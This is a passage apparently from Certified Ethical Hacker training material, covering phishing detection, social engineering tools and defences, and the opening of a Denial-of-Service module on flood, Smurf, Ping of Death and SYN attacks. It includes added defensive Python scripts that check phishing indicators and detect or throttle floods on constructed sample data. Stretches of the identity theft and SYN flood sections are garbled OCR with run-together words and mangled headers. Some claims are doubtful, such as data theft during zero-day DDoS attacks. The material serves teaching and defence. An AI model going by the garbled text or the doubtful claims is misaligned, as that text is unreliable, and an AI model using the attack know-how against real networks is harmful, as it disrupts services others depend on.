- Do not display account or contact numbers unless mandatory
- Monitor online banking activities regularly
- Never list any personal identifiers on social media websites such as your father's name, pet's name, address, or city of birth
- Enable two-factor authentication on all online accounts
- Never use public Wi-Fi for sharing or accessing sensitive information

ical andCountermensores
Mackin ©by E-Comel
Copyright
‘=
toolssuchas a firewallandanti-virus on yourpersonal
Installhostsecurity computer
Someadditionalcountermeasures against theft are as follows:
identity
=
Tokeep
mail
secure,
asking
requests mailbox
emptyyour
forpersonal
quickly
information
anddo not reply
to unsolicited
email

Shredcreditcardoffersand“convenience
checks―
that are not useful
Donot store any financialinformationon the system anduse strongpasswords
for all
financial
accounts,
Checktelephone andcellphone billsforcallsyou didnot make,
KeepyourSocialSecurity card,passport, license,andothervaluablepersonal
informationhiddenandsecured.
Readwebsiteprivacypolicies.
Becautious beforeclicking
on a link provided
in an emailor instant message.

ical andCountermensores
Mackin ©by E-Comel
Copyright
How to Detect Phishing Emails?
To detect phishing emails, first hover your mouse pointer over the name in the "From" column. Doing so will show whether the original domain name is linked to the sender's email. For example, an email from Gmail.com should probably display its domain as "gmail.com"; if it does not, then it could be a phishing email.

Check to see if the email provides a URL and prompts the user to click on it. If so, ensure that the link is legitimate by hovering the mouse pointer over it (to display the link's URL) and ensure it uses encryption (https://). Note that https:// only indicates that the connection is encrypted; it does not establish who operates the site, and many phishing sites also use https://. To be on the safe side, always open a new window and visit the site by typing its address in directly instead of clicking on the link provided in the email. Do not provide any information to the suspicious website, as it will likely link directly to the attacker.

A few other indicators of phishing emails:
- It seems to be from a bank, company, or social networking site and has a generic greeting
- It seems to be from a person listed in your email address book
- It has an urgent tone or makes a veiled threat
- It may contain grammatical or spelling mistakes
- It includes links to spoofed websites
- It may contain offers that seem to be too good to be true
- It includes official-looking logos and other information taken from legitimate websites
- It may contain a malicious attachment

Figure 9.15: Screenshot of an Email Showing Indications of Phishing
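The checks above can be automated for mail triage. The script below is an added example written for this page and is not part of the EC-Council courseware: it applies the "From" domain check against the brand the display name claims, looks for a generic greeting and urgency wording, and compares each link's visible text with its real href host, flagging plain http:// links and links to a bare IP address. The sample message, its addresses and domains are constructed for the example.

```python
import re
from email import message_from_string
from email.utils import parseaddr
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample message (not a real email) for demonstration.
SAMPLE_EMAIL = """\
From: "PayPal Support" <support@paypa1-secure.example>
To: victim@example.org
Subject: Urgent: your account will be suspended
Content-Type: text/html

<html><body>
<p>Dear Customer,</p>
<p>Your account has been limited. Verify immediately or it will be suspended.</p>
<p><a href="http://198.51.100.7/login">https://www.paypal.com/signin</a></p>
</body></html>
"""

URGENCY_WORDS = ("urgent", "immediately", "suspended", "verify", "limited")
GENERIC_GREETINGS = ("dear customer", "dear user", "dear member")


class _LinkExtractor(HTMLParser):
    """Collects (href, visible anchor text) pairs from an HTML body."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href") or ""
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def _host(url):
    return (urlparse(url).hostname or "").lower()


def phishing_indicators(raw_email, expected_domain=None):
    """Return the list of indicators found; an empty list means no heuristic fired,
    not that the mail is safe. expected_domain is the domain the display name
    claims to represent (e.g. 'paypal.com')."""
    msg = message_from_string(raw_email)
    indicators = []

    # Check 1: the address domain does not belong to the brand named in "From".
    display_name, addr = parseaddr(msg.get("From", ""))
    sender_domain = addr.rsplit("@", 1)[-1].lower() if "@" in addr else ""
    if expected_domain and not (
        sender_domain == expected_domain or sender_domain.endswith("." + expected_domain)
    ):
        indicators.append(f"from-domain mismatch: '{display_name}' sends from {sender_domain}")

    body = "" if msg.is_multipart() else msg.get_payload(decode=True).decode("utf-8", "replace")
    text = body.lower()

    # Check 2: generic greeting and urgent tone.
    if any(g in text for g in GENERIC_GREETINGS):
        indicators.append("generic greeting")
    if any(w in text for w in URGENCY_WORDS):
        indicators.append("urgent tone")

    # Check 3: link text shows one host but the href goes elsewhere; plain http;
    # or a link to a raw IP address instead of a hostname.
    parser = _LinkExtractor()
    parser.feed(body)
    for href, shown in parser.links:
        href_host = _host(href)
        shown_host = _host(shown) if shown.startswith(("http://", "https://")) else ""
        if shown_host and shown_host != href_host:
            indicators.append(f"link text {shown_host} but target {href_host}")
        if urlparse(href).scheme == "http":
            indicators.append(f"unencrypted link to {href_host}")
        if re.fullmatch(r"\d{1,3}(\.\d{1,3}){3}", href_host):
            indicators.append(f"link to raw IP {href_host}")
    return indicators


if __name__ == "__main__":
    for ind in phishing_indicators(SAMPLE_EMAIL, expected_domain="paypal.com"):
        print("-", ind)
```

The constructed sample trips all three groups of checks. The heuristics are intentionally simple; in practice they would be combined with SPF/DKIM results and a reputation feed such as the ones described in the next pages.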
Anti-Phishing Toolbar
- Netcraft
Source: https://toolbar.netcraft.com
The Netcraft anti-phishing community is a giant neighborhood watch scheme, empowering the most alert and most expert members to defend everyone within the community against phishing attacks. The Netcraft Toolbar provides updated information about sites that users visit regularly and blocks dangerous sites. The toolbar provides a wealth of information about popular websites. This information will help to make an informed choice about the integrity of those sites.
As shown in the screenshot, Netcraft protects individuals and organizations from phishing attacks and fraudsters.

Figure 9.16: Screenshot of Netcraft (a page blocked as a suspected malicious page)
- PhishTank
Source: https://phishtank.com
PhishTank is a collaborative clearinghouse for data and information about phishing on the Internet. It provides an open API for developers and researchers to integrate anti-phishing data into their applications. As shown in the screenshot, security professionals can use PhishTank to check whether a malicious URL is a phishing site or not.

Figure 9.17: Screenshot of PhishTank
Common Social Engineering Targets and Defense Strategies
Attackers implement various social engineering techniques to trick people into providing sensitive information about their organizations, thus helping attackers to launch malicious activities. These techniques are used on privileged individuals or those who deal with important information.
The table below shows common social engineering targets, the social engineering techniques that attackers use against them, and the defense strategies to counter these attacks.

Social Engineering Targets | Attack Techniques | Defense Strategies
Front office and help desk staff | Eavesdropping, shoulder surfing, impersonation, persuasion, and intimidation | Train employees never to reveal passwords or other information over the phone. Enforce policies for the front office and help desk personnel.
Technical support executives and system administrators | Impersonation, persuasion, intimidation, fake SMS, phone calls, and emails | Train technical support executives and system administrators never to reveal passwords or other information over the phone or email.
Perimeter security | Impersonation, reverse social engineering, piggybacking, tailgating, etc. | Implement strict badge, token, or biometric authentication, employee training, and security guards.
Office | Shoulder surfing, eavesdropping, and ingratiation | Implement employee training, best practices, and checklists for using passwords. Escort all guests.
Vendors of the target organization | Impersonation, persuasion, and intimidation | Educate vendors about social engineering.
Mail room | Theft, damage, or forging of mails | Lock and monitor the mail room; train employees.
Machine room and phone closet | Attempting to gain access, remove equipment, or attach a protocol analyzer to extract confidential data | Keep phone closets, server rooms, and other spaces locked at all times, and keep an updated inventory of equipment.
Company's executives | Fake SMS, phone calls, and emails designed to grab confidential data | Train executives never to reveal identity, passwords, or other confidential information over the phone or email.
Dumpster | Dumpster diving | Keep all trash in secured, monitored areas; shred important data; and erase magnetic media.

Table 9.3: Common social engineering targets and defense strategies
Social Engineering Tools
- Social Engineering Toolkit (SET)
Source: https://www.trustedsec.com
The Social-Engineer Toolkit (SET) is an open-source Python-driven tool aimed at penetration testing via social engineering. It is a generic exploit framework designed to perform advanced attacks against human elements to compromise a target and make them offer sensitive information. SET categorizes attacks such as email, web, and USB attacks according to the attack vector used to trick humans. The toolkit attacks human weakness, exploiting the trusting, fearful, greedy, and helpful nature of humans.

Figure 9.18: Screenshot of SET showing menu and attack options

Some social engineering tools are listed below:
- SpeedPhish Framework (SPF) (https://github.com)
- Gophish (https://getgophish.com)
- King Phisher (https://github.com)
- LUCY (https://www.lucysecurity.com)
- MSI Simple Phish (https://microsolved.com)
Audit Organization's Security for Phishing Attacks using OhPhish
The primary objective of launching phishing campaigns against employees of the client organization is to assess the employees' susceptibility to phishing attacks and help the organization reduce the risks that arise when employees fall prey to phishing attacks sent by cyber-threat actors.
- OhPhish
Source: https://ohphish.eccouncil.org
OhPhish is a web-based portal for testing employees' susceptibility to social engineering attacks. It is a phishing simulation tool that provides the organization with a platform to launch phishing simulation campaigns on its employees. The platform captures the responses and provides MIS reports and trends (on a real-time basis) that can be tracked according to the user, department, or designation.
OhPhish can be used to audit an organization's security for phishing attacks using various phishing methods such as Entice to Click, Credential Harvesting, Send Attachment, Training, Vishing, and Smishing.

Figure 9.19: Screenshot of OhPhish
Module Summary
This module discussed social engineering concepts along with the various phases of a social engineering attack. It also discussed various human-based, computer-based, and mobile-based social engineering techniques. The module discussed insider threats, including the various types of insider threats. It gave an overview of impersonation on social networking sites. It also discussed identity theft and the types of identity theft. The module ended with a detailed discussion of various signs to watch for and countermeasures to employ in order to defend against social engineering attacks, insider threats, and identity theft.
The next module will show how attackers, as well as ethical hackers and pen testers, perform DoS/DDoS attacks.
Certified Ethical Hacker

Module 10: Denial-of-Service
Module Objectives
Denial-of-Service (DoS) and Distributed Denial-of-Service (DDoS) attacks are a major threat to computer networks. These attacks attempt to make a machine or network resource unavailable to its authorized users. Usually, DoS/DDoS attacks exploit vulnerabilities in the implementation of the Transmission Control Protocol (TCP)/Internet Protocol (IP) model or bugs in a specific operating system (OS).
This module starts with an overview of DoS and DDoS attacks and then provides insight into different DoS/DDoS attack techniques. Later, it discusses the botnet network, DoS/DDoS attack tools, techniques to detect DoS/DDoS attacks, and DoS/DDoS countermeasures.
At the end of this module, you will be able to do the following:
- Describe DoS/DDoS concepts
- Understand various DoS/DDoS attack techniques
- Describe botnets
- Illustrate DoS/DDoS case studies
- Explain different DoS/DDoS attack tools
- Apply best practices to mitigate DoS/DDoS attacks
Module Flow

DoS/DDoS Concepts
For a good understanding of DoS/DDoS attacks, one must be familiar with the related concepts in advance. This section defines DoS and DDoS attacks and discusses how DDoS attacks work.
What is a DoS Attack?
A DoS attack is an attack on a computer or network that reduces, restricts, or prevents access to system resources for legitimate users. In a DoS attack, attackers flood a victim's system with nonlegitimate service requests or traffic to overload its resources and bring down the system, leading to the unavailability of the victim's website or at least significantly reducing the victim's system or network performance. The goal of a DoS attack is to keep legitimate users from using the system, rather than to gain unauthorized access to a system or to corrupt data.
The following are examples of types of DoS attacks:
- Flooding the victim's system with more traffic than it can handle
- Flooding a service (e.g., Internet Relay Chat [IRC]) with more events than it can handle
- Crashing a TCP/IP stack by sending corrupt packets
- Crashing a service by interacting with it in an unexpected manner
- Hanging a system by causing it to go into an infinite loop
Figure 10.1: Schematic of a DoS attack

DoS attacks have various forms and target various services. The attacks may cause the following:
- Consumption of resources
- Consumption of bandwidth, disk space, CPU time, or data structures
- Actual physical destruction or alteration of network components
- Destruction of programming and files in a computer system
In general, DoS attacks target network bandwidth or connectivity. Bandwidth attacks overflow the network with a high volume of traffic by using existing network resources, thereby depriving legitimate users of these resources. Connectivity attacks overflow a system with a large number of connection requests, consuming all available OS resources to prevent the system from processing legitimate user requests.

Consider a food catering company that conducts much of its business over the phone. If an attacker wants to disrupt this business, they need to find a way to block the company's phone lines, which would make it impossible for the company to do business. A DoS attack works along the same lines: the attacker uses up all the ways to connect to the victim's system, making legitimate business impossible.
DoS attacks are a kind of security breach that does not generally result in the theft of information. However, these attacks can harm the target in terms of time and resources. Furthermore, a security failure might cause the loss of a service such as email. In the worst-case scenario, a DoS attack can cause the accidental destruction of the files and programs of millions of people who were connected to the victim's system at the time of the attack.
What is a DDoS Attack?
Source: http://searchsecurity.techtarget.com
A DDoS attack is a large-scale, coordinated attack on the availability of services on a victim's system or network resources, and it is launched indirectly through many compromised computers (botnets) on the Internet.

As defined by the World Wide Web Security FAQ, "A distributed denial-of-service (DDoS) attack uses many computers to launch a coordinated DoS attack against one or more targets. Using client/server technology, the perpetrator is able to multiply the effectiveness of the denial of service significantly by harnessing the resources of multiple unwitting accomplice computers, which serve as attack platforms."
The flood of incoming messages to the target system essentially forces it to shut down, thereby denying service to legitimate users. The services under attack belong to the "primary victim," whereas the compromised systems used to launch the attack are called "secondary victims." The use of secondary victims in performing a DDoS attack enables the attacker to mount a large and disruptive attack while making it difficult to track down the original attacker.
The first step in mounting a DDoS attack is to gain administrative access on as many systems as possible. In general, attackers use a customized attack script to identify potentially vulnerable systems. After gaining access to the target systems, the attacker uploads and runs DDoS software on these systems at the time chosen to launch the attack.
DDoS attacks have become popular because of the easy accessibility of exploit plans and the negligible amount of brainwork required to execute them. These attacks can be very dangerous because they can quickly consume the largest hosts on the Internet, rendering them useless.
The impacts of DDoS include the loss of goodwill, disabled networks, financial losses, and disabled organizations.

How do DDoS Attacks Work?
In a DDoS attack, many applications barrage a target browser or network with fake exterior requests that make the system, network, browser, or site slow, useless, disabled, or unavailable.
The attacker initiates the DDoS attack by sending a command to zombie agents, which are Internet-connected computers compromised by an attacker through malware programs to perform various malicious activities through a command and control (C&C) server. These zombie agents send a connection request to a large number of reflector systems with the spoofed IP address of the victim, which causes the reflector systems to presume that these requests originate from the victim's machine instead of the zombie agents. Hence, the reflector systems send the requested information (the response to the connection request) to the victim. Consequently, the victim's machine is flooded with unsolicited responses from several reflector computers simultaneously, which may either reduce the performance or cause the victim's machine to shut down completely.

Figure 10.2: Schematic of a DDoS attack (compromised PCs acting as zombies)
Module Flow

DoS/DDoS Attack Techniques
Attackers implement various techniques to launch DoS/DDoS attacks on target computers or networks. This section discusses the basic categories of DoS/DDoS attack vectors and various attack techniques.
Basic Categories of DoS/DDoS Attack Vectors
DDoS attacks mainly aim to diminish the network bandwidth by exhausting network, application, or service resources, thereby restricting legitimate users from accessing system or network resources. In general, DoS/DDoS attack vectors are categorized as follows:

Volumetric Attacks
These attacks exhaust the bandwidth either within the target network/service or between the target network/service and the rest of the Internet to cause traffic blockage, preventing access to legitimate users. The attack magnitude is measured in bits per second (bps).
Volumetric DDoS attacks generally target protocols such as the Network Time Protocol (NTP), Domain Name System (DNS), and Simple Service Discovery Protocol (SSDP), which are stateless and do not have built-in congestion avoidance features. The generation of a large number of packets can cause the consumption of the entire bandwidth on the network. A single machine cannot make enough requests to overwhelm network equipment. Hence, in DDoS attacks, the attacker uses several computers to flood a victim. In this case, the attacker can control all the machines and instruct them to direct traffic to the target system. DDoS attacks flood a network, causing a significant statistical change in network traffic that overwhelms network equipment such as switches and routers. Attackers use the processing power of a large number of geographically distributed machines to generate huge traffic directed at the victim, which is why such an attack is called a DDoS attack.
There are two types of bandwidth depletion attacks:
- In a flood attack, zombies send large volumes of traffic to the victim's systems to exhaust the bandwidth of these systems.
- In an amplification attack, the attacker or zombies transfer messages to a broadcast IP address. This method amplifies malicious traffic that consumes the bandwidth of the victim's systems.
Attackers use botnets and perform DDoS attacks by flooding the network. The entire bandwidth is used up by attackers, and no bandwidth remains for legitimate use. The following are examples of volumetric attack techniques:
- User Datagram Protocol (UDP) flood attack
- Internet Control Message Protocol (ICMP) flood attack
- Ping of Death (PoD) attack
- Smurf attack
- Pulse wave attack
- Zero-day attack
- Malformed IP packet flood attack
- Spoofed IP packet flood attack

Protocol Attacks
Attackers can also prevent access to a target by consuming types of resources other than bandwidth, such as connection state tables. Protocol DDoS attacks exhaust resources available on the target or on a specific device between the target and the Internet. These attacks consume the connection state tables present in network infrastructure devices such as load balancers, firewalls, and application servers. Consequently, no new connections will be allowed, because the device will be waiting for existing connections to close or expire. In this case, the attack magnitude is measured in packets per second (pps) or connections per second (cps). These attacks can even take over the state of millions of connections maintained by high-capacity devices.
The following are examples of protocol attack techniques:
- Synchronize (SYN) flood attack
- Fragmentation attack
- Spoofed session flood attack
- Acknowledgement (ACK) flood attack
- SYN-ACK flood attack
- ACK and PUSH ACK flood attack
- TCP connection flood attack
- TCP state exhaustion attack
- RST attack
Application Layer Attacks
In these attacks, the attacker attempts to exploit vulnerabilities in the application layer protocol or in the application itself to prevent legitimate users from accessing the application. Attacks on unpatched, vulnerable systems do not require as much bandwidth as protocol or volumetric DDoS attacks to succeed. In application DDoS attacks, the application layer or application resources are consumed by opening connections and leaving them open until no new connections can be made. These attacks destroy a specific aspect of an application or service and can be effective with one or a few attacking machines that produce a low traffic rate. Furthermore, these attacks are very difficult to detect and mitigate. The magnitude of the attack is measured in requests per second (rps).
Application-level flood attacks result in the loss of services of a particular network, such as emails and network resources, or the temporary shutdown of applications and services. Through this attack, attackers exploit weaknesses in programming source code to prevent the application from processing legitimate requests.
Several kinds of DoS attacks rely on software-related exploits such as buffer overflows. A buffer overflow attack sends excessive data to an application that either shuts down the application or forces the data sent to the application to run on the host system. The attack crashes a vulnerable system remotely by sending excessive traffic to an application. Occasionally, attackers can also execute arbitrary code on the remote system via a buffer overflow. Sending too much data to an application overwrites the data that controls the program, enabling the hacker to run their code instead.
Using application-level flood attacks, attackers attempt to do the following:
- Flood web applications with legitimate-looking user traffic
- Disrupt service to a specific system or person by, for example, blocking a user's access through repeated invalid login attempts
- Jam the application database connection by crafting malicious Structured Query Language (SQL) queries
Application-level flood attacks can result in a substantial loss of money, service, and reputation for organizations. These attacks occur after the establishment of a connection. Because a connection is established and the traffic entering the target appears to be legitimate, it is difficult to detect these attacks. However, if the user identifies the attack, they can stop it and trace it back to its source more easily than other types of DDoS attacks.
The following are examples of application layer attack techniques:
- Hypertext Transfer Protocol (HTTP) flood attack
- Slowloris attack
- UDP application layer flood attack
DoS/DDoS Attack Techniques
Next, the following DoS/DDoS attack techniques will be discussed:
- UDP flood attack
- ICMP flood attack
- Ping of Death attack
- Smurf attack
- Pulse wave attack
- Zero-day attack
- SYN flood attack
- Fragmentation attack
- ACK flood attack
- TCP state exhaustion attack
- Spoofed session flood attack
- HTTP GET/POST attack
- Slowloris attack
- UDP application layer flood attack
- Multi-vector attack
- Peer-to-peer attack
- Permanent DoS (PDoS) attack
- Distributed reflection DoS (DRDoS) attack
UDP Flood Attack
In a UDP flood attack, an attacker sends spoofed UDP packets at a very high packet rate to a remote host on random ports of a target server by using a large source IP range. The flooding of UDP packets causes the server to check repeatedly for nonexistent applications at the ports. Consequently, legitimate applications become inaccessible by the system, and any attempts to access them return an error reply with an ICMP "Destination Unreachable" packet. This attack consumes network resources and available bandwidth, exhausting the network until it goes offline.

Figure 10.3: UDP flood attack
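The three properties described above (high packet rate, random destination ports, and a wide spoofed source range) give a detector something to key on that a busy legitimate UDP service does not share. The following is an added example written for this page, not EC-Council code: it buckets UDP flow records per destination and one-second window and raises an alert only when rate, destination-port spread, and the share of packets aimed at ports with no listener are all high. The target address, its listening ports, and the traffic sample are constructed for the example.

```python
import random
from collections import defaultdict

# Hypothetical target and its real UDP listeners (constructed for the example).
TARGET = "203.0.113.10"
LISTENING_PORTS = {TARGET: {53, 123}}


def build_sample_traffic(seed=1):
    """Constructed flow records (time_s, src_ip, dst_ip, dst_port), not a capture.
    Second 0: only legitimate DNS/NTP queries. Second 1: the same clients, plus a
    spoofed random-port UDP flood from a wide source range."""
    rng = random.Random(seed)
    pkts = []
    for sec in (0, 1):
        for i in range(40):  # legitimate clients, about 40 packets per second
            pkts.append((sec + i / 40, f"198.51.100.{i % 8 + 1}", TARGET, rng.choice((53, 123))))
    for i in range(3000):  # flood: spoofed sources, random high ports, all in second 1
        src = f"{rng.randint(1, 223)}.{rng.randint(0, 255)}.{rng.randint(0, 255)}.{rng.randint(1, 254)}"
        pkts.append((1 + i / 3000, src, TARGET, rng.randint(1024, 65535)))
    return pkts


def summarize_windows(packets, listening, window_s=1.0):
    """Per (dst_ip, window) stats: packets per second, distinct destination ports,
    distinct sources, and the share of packets aimed at ports with no listener
    (the packets the target would answer with ICMP Destination Unreachable)."""
    acc = defaultdict(lambda: {"packets": 0, "ports": set(), "srcs": set(), "closed": 0})
    for t, src, dst, port in packets:
        s = acc[(dst, int(t // window_s))]
        s["packets"] += 1
        s["ports"].add(port)
        s["srcs"].add(src)
        if port not in listening.get(dst, set()):
            s["closed"] += 1
    return {
        key: {
            "pps": s["packets"] / window_s,
            "distinct_ports": len(s["ports"]),
            "distinct_srcs": len(s["srcs"]),
            "closed_ratio": s["closed"] / s["packets"],
        }
        for key, s in acc.items()
    }


def detect_udp_flood(packets, listening, window_s=1.0, min_pps=500, min_ports=50, min_closed_ratio=0.8):
    """Flag a window only when all three signals are high: a busy DNS server is
    high-rate but hits one open port, and a port scan hits many closed ports but at
    a low rate. Thresholds are illustrative and must be tuned per network."""
    alerts = []
    for (dst, win), st in sorted(summarize_windows(packets, listening, window_s).items()):
        if (st["pps"] >= min_pps and st["distinct_ports"] >= min_ports
                and st["closed_ratio"] >= min_closed_ratio):
            alerts.append((dst, win, st))
    return alerts


if __name__ == "__main__":
    for dst, win, st in detect_udp_flood(build_sample_traffic(), LISTENING_PORTS):
        print(f"UDP flood against {dst} in second {win}: {st}")
```

On the constructed sample only second 1 is flagged; second 0, which carries the same legitimate DNS and NTP queries, has a closed-port share of zero and stays silent.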
ICMP Flood Attack
Network administrators use ICMP primarily for IP operations, troubleshooting, and error messaging for undeliverable packets. In this attack, attackers send large volumes of ICMP echo request packets to a victim's system directly or through reflection networks. These packets signal the victim's system to reply, and the large traffic saturates the bandwidth of the victim's network connection, causing it to be overwhelmed and subsequently stop responding to legitimate TCP/IP requests.
To protect against ICMP flood attacks, it is necessary to set a threshold that invokes the ICMP flood attack protection feature when exceeded. When the ICMP threshold is exceeded (by default, the threshold value is 1000 packets/s), the router rejects further ICMP echo requests from all addresses in the same security zone for the remainder of the current second as well as the next second.

Figure 10.4: ICMP flood attack (the attacker sends ICMP ECHO requests with spoofed source addresses to the target server; a legitimate ICMP ECHO request from an address in the same security zone is also shown)
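The threshold rule above is concrete enough to implement and replay against a sample. The following is an added example written for this page, not EC-Council code or any vendor's implementation: a per-zone counter that, once the echo-request count in a second exceeds the threshold, drops every further echo request from that zone for the rest of that second and the whole next second. The replay shows the side effect a practitioner must plan for: because the block is per zone, a legitimate host in the same zone as the spoofed sources also loses its pings for those two seconds. Zone names, addresses, and traffic are constructed.

```python
from collections import defaultdict

DEFAULT_THRESHOLD = 1000  # packets per second, the default quoted in the text


class IcmpFloodGuard:
    """Per-zone echo-request throttle: count requests per (zone, second); once the
    count exceeds the threshold, reject all further requests from that zone for the
    remainder of the current second and the entire next second."""

    def __init__(self, threshold=DEFAULT_THRESHOLD):
        self.threshold = threshold
        self._count = defaultdict(int)   # (zone, second) -> echo requests seen
        self._blocked_until = {}         # zone -> last blocked second (inclusive)

    def allow(self, zone, time_s):
        sec = int(time_s)
        if self._blocked_until.get(zone, -1) >= sec:
            return False
        self._count[(zone, sec)] += 1
        if self._count[(zone, sec)] > self.threshold:
            self._blocked_until[zone] = sec + 1   # rest of this second plus the next
            return False
        return True


def replay(guard, packets):
    """packets: iterable of (time_s, zone, src_ip) echo requests in time order.
    Returns {src_ip: (allowed, dropped)} so collateral damage is visible per host."""
    result = defaultdict(lambda: [0, 0])
    for t, zone, src in packets:
        result[src][0 if guard.allow(zone, t) else 1] += 1
    return {src: tuple(v) for src, v in result.items()}


def build_sample(threshold=DEFAULT_THRESHOLD):
    """Constructed sample (not a capture): one legitimate host in zone 'untrust'
    pings once per second for four seconds; during second 1 an attacker sends
    threshold + 200 spoofed echo requests into the same zone."""
    pkts = [(s + 0.5, "untrust", "198.51.100.5") for s in range(4)]
    n = threshold + 200
    pkts += [(1 + (i / n) * 0.4, "untrust", f"203.0.113.{i % 254 + 1}") for i in range(n)]
    return sorted(pkts)


if __name__ == "__main__":
    counts = replay(IcmpFloodGuard(), build_sample())
    print("legitimate host (allowed, dropped):", counts["198.51.100.5"])
    attacker = [v for s, v in counts.items() if s.startswith("203.0.113.")]
    print("attacker allowed/dropped:", sum(a for a, _ in attacker), sum(d for _, d in attacker))
```

In the replay, the first 1000 flood packets of second 1 are accepted before the threshold trips, the remaining 200 are dropped, and the legitimate host's pings at t=1.5 s and t=2.5 s are dropped with them; its pings at t=0.5 s and t=3.5 s go through.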
Ping of Death Attack
In a Ping of Death (PoD) attack, an attacker attempts to crash, destabilize, or freeze the target system or service by sending malformed or oversized packets using a simple ping command. Suppose an attacker sends a packet with a size of 65,538 bytes to the target web server. This size exceeds the size limit prescribed by RFC 791 for IP, which is 65,535 bytes. Because no link can carry such a packet, it arrives as a series of IP fragments, each of which is individually legal; the oversize becomes visible only when the receiver adds the last fragment's offset and length. The reassembly process performed by the receiving system might cause the system to crash. In such attacks, the attacker's identity can be easily spoofed, and the attacker might not need detailed knowledge of the target machine, except its IP address.

Figure 10.5: Ping of Death attack (IP header 20 bytes, ICMP header 8 bytes)
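The following is an added example written for this page, not EC-Council code: it builds the fragment list a sender would emit for an ICMP echo of a given payload size and then applies the receiver-side check that prevents the Ping of Death, rejecting the datagram before any fragment data is copied whenever a fragment's offset plus length would exceed what a legal IP datagram can hold. The 65,510-byte payload reproduces the 65,538-byte total from the text (65,510 + 8-byte ICMP header + 20-byte IP header); the MTU of 1500 is an assumption.

```python
IP_MAX_TOTAL = 65535   # largest Total Length the 16-bit IP field can express (RFC 791)
IP_HDR = 20            # IP header without options
ICMP_HDR = 8           # ICMP echo header
MAX_OFFSET_UNITS = 8191  # fragment offset is a 13-bit field of 8-byte units


def fragment_echo(icmp_payload_len, mtu=1500):
    """Split an ICMP echo with the given payload into IP fragments as a sender would.
    Returns [(offset_units, more_fragments, data_len)]. Offsets are in 8-byte units,
    so every non-final fragment carries a multiple of 8 data bytes."""
    total_data = ICMP_HDR + icmp_payload_len      # ICMP header + payload is the IP data
    per_frag = (mtu - IP_HDR) // 8 * 8            # largest multiple of 8 that fits the MTU
    frags, pos = [], 0
    while pos < total_data:
        size = min(per_frag, total_data - pos)
        frags.append((pos // 8, pos + size < total_data, size))
        pos += size
    return frags


def reassembly_check(frags):
    """Receiver-side check performed before copying fragment data into the
    reassembly buffer. Rejects the datagram if any fragment's data would end beyond
    the maximum legal datagram size (the Ping of Death condition) or uses an offset
    the header field cannot hold. Returns (accepted, total_datagram_len_or_None)."""
    end = 0
    for off, _more, size in frags:
        if off > MAX_OFFSET_UNITS:
            return False, None
        frag_end = off * 8 + size
        if IP_HDR + frag_end > IP_MAX_TOTAL:
            return False, None
        end = max(end, frag_end)
    return True, IP_HDR + end


if __name__ == "__main__":
    for payload in (56, 60000, 65510):
        frags = fragment_echo(payload)
        ok, total = reassembly_check(frags)
        print(f"payload {payload:>5} bytes -> {len(frags):>2} fragments, "
              f"{'accepted, total ' + str(total) if ok else 'REJECTED (oversized)'}")
```

A normal 56-byte ping is a single 84-byte datagram, a large but legal 60,000-byte payload reassembles to 60,028 bytes, and the 65,510-byte payload is refused at its final fragment even though each of its 45 fragments fits within the MTU on the wire.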

Smurf Attack
In a Smurf attack, the attacker spoofs the source IP address with the victim's IP address and sends a large number of ICMP ECHO request packets to an IP broadcast network. This causes all the hosts on the broadcast network to respond to the received ICMP ECHO requests. These responses are sent to the victim's machine because the IP address was spoofed by the attacker, causing significant traffic to the victim's machine and ultimately making it crash.

Figure 10.6: Smurf attack (attacker, broadcast network, victim)
Pulse Wave DDoS Attack
Pulse wave DDoS attacks are the latest type of DDoS attack employed by threat actors to disrupt the standard operations of targets. Generally, DDoS attack patterns are continuous incoming traffic flows. However, in pulse wave DDoS attacks, the attack pattern is periodic, and the attack is huge, consuming the entire bandwidth of target networks. Attackers send a highly repetitive train of packets as pulses to the target victim every 10 min, and the attack session lasts for approximately an hour or some days. A single pulse (300 Gbps or more) is more than enough to crowd a network pipe. Recovery from such attacks is very difficult and occasionally impossible.

Figure 10.7: Pulse wave DDoS attack

Zero-Day DDoS Attack
Zero-day DDoS attacks are attacks in which the exploited DDoS vulnerabilities do not have patches or effective defensive mechanisms. Until the victim identifies the threat actor's attack strategy and deploys a patch for the exploited DDoS vulnerability, the attacker actively blocks all the victim's resources and steals the victim's data. These attacks can cause severe damage to the victim's network infrastructure and assets. Currently, there is no versatile approach to protect networks from this type of attack.
Flood Attack
In a SYNattack,the attackersendsa large numberof SYNrequests to the targetserver (victim)
with fakesource IP addresses. Theattack creates incomplete TCPconnections that use up
networkresources. Normally, whena clientwants to begin a TCPconnection to a server, the
clientandserver exchange thefollowing seriesof messages
+
ATCPSYNrequest packetis sent toa server.
+
Theserver sendsa SYN/ACK (acknowledgement) i n responseto the request.
‘Theclientsendsa response
ACKto the server to complete
the session setup.
Thismethodisa “three-way
handshake.―
In a SYN attack, the attacker exploits the three-way handshake method. First, the attacker sends a fake TCP SYN request to the target server. After the server sends a SYN/ACK in response to the client's (attacker's) request, the client never sends an ACK response. This leaves the server waiting to complete the connection.

SYN flooding takes advantage of the flawed manner in which most hosts implement the TCP three-way handshake. This attack occurs when the attacker sends unlimited SYN packets (requests) to the host system. The process of transmitting such packets is faster than the system can handle. Normally, a connection is established with the TCP three-way handshake. The host keeps track of partially open connections while waiting for response ACK packets in a listening queue.

As shown in the figure, when Host B receives a SYN request from Host A, it must keep track of the partially opened connection in a "listen queue" for at least 75 s.

Figure 10.8: SYN flood attack
A malicious host can exploit another host managing many partial connections by sending many SYN requests to the target host simultaneously. When the queue is full, the system cannot open new connections until it drops some entries from the connection queue through timeouts. This ability to hold up each incomplete handshake connection for 75 s can be cumulatively exploited in a DoS attack. The attack uses fake IP addresses, making it difficult to trace the source. An attacker can fill a table of connections even without spoofing the source IP address.

In addition to SYN flood attacks, attackers can also employ SYN-ACK and ACK/PUSH ACK flood attacks to disrupt target machines. All these attacks are similar in functionality, with minor variations.
SYN-ACK Flood Attack

This type of attack is similar to the SYN flood attack, except that in this type of flood attack, the attacker exploits the second stage of a three-way handshake by sending a large number of SYN-ACK packets to the target machine to exhaust its resources.

ACK and PUSH ACK Flood Attack

